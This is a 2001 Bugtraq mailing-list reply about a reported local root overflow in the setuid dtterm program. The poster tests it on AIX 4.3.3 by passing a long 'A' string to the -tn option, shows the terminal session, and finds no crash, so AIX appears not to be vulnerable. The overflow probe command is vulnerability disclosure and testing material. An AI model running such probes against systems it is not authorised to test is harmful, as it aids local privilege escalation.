[22795] in bugtraq
Re: OpenUNIX 8 & Unixware possible local root
daemon@ATHENA.MIT.EDU (Scott J)
Thu Oct 4 19:42:51 2001
Message-ID: <20011004142339.62461.qmail@web12107.mail.yahoo.com>
Date: Thu, 4 Oct 2001 07:23:39 -0700 (PDT)
From: Scott J <mrbinary@yahoo.com>
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
For whatever reason, it seems that AIX may not be
vulnerable. This test performed on a stinky old E30
133 MHz RS/6000, 512 MB "server" (more like a workstation
now, and a wimpy one at that). But it's the only
thing I could get my hands on to try this exploit(?) I was
unable to get dtterm to segfault.
This is AIX 4.3.3 with maintenance level of at least 6
applied, more likely 7 or 8.
It's a uniprocessor box: lslpp -ha bos.up returns 4.3.3.26
applied & committed.
Apologies to Bugtraqqers, I don't have time to try out the
entire dt suite o' crap at the moment with
the problems that have just cropped up. See details below.
myuserid@ourhost01.fq.dn [/home/net/myuserid] [0]
$ date
date
Thu Oct 4 08:58:33 EDT 2001
myuserid@ourhost01.fq.dn [/home/net/myuserid] [0]
$ uname -a
uname -a
AIX ourhost01 3 4 00299A86C000
myuserid@ourhost01.fq.dn [/home/net/myuserid] [0]
$ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x23462'`
/usr/dt/bin/dtterm -tn `perl -e 'print "A"x23462'`
ksh: /usr/dt/bin/dtterm: arg list too long
myuserid@ourhost01.fq.dn [/home/net/myuserid] [126]
$ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x23461'`
/usr/dt/bin/dtterm -tn `perl -e 'print "A"x23461'`
myuserid@ourhost01.fq.dn [/home/net/myuserid] [0]
$ ls -al core
ls -al core
core not found
myuserid@ourhost01.fq.dn [/home/net/myuserid] [2]
$ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x23461'`
/usr/dt/bin/dtterm -tn `perl -e 'print "A"x23461'`
myuserid@ourhost01.fq.dn [/home/net/myuserid] [0]
$ ls -al core
ls -al core
core not found
myuserid@ourhost01.fq.dn [/home/net/myuserid] [2]
$ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x23461'`
/usr/dt/bin/dtterm -tn `perl -e 'print "A"x23461'`
myuserid@ourhost01.fq.dn [/home/net/myuserid] [0]
$ ls -al core
ls -al core
core not found
myuserid@ourhost01.fq.dn [/home/net/myuserid] [2]
$
myuserid@ourhost01.fq.dn [/home/net/myuserid] [2]
$ ls -al /usr/dt/bin/dtterm
ls -al /usr/dt/bin/dtterm
-r-sr-xr-x 1 root bin 40756 Jul 13 1999
/usr/dt/bin/dtterm
Slán leat agus go n'eirí an bóthar leat.
__________________________________________________
Do You Yahoo!?
NEW from Yahoo! GeoCities - quick and easy web site hosting, just $8.95/month.
http://geocities.yahoo.com/ps/info1
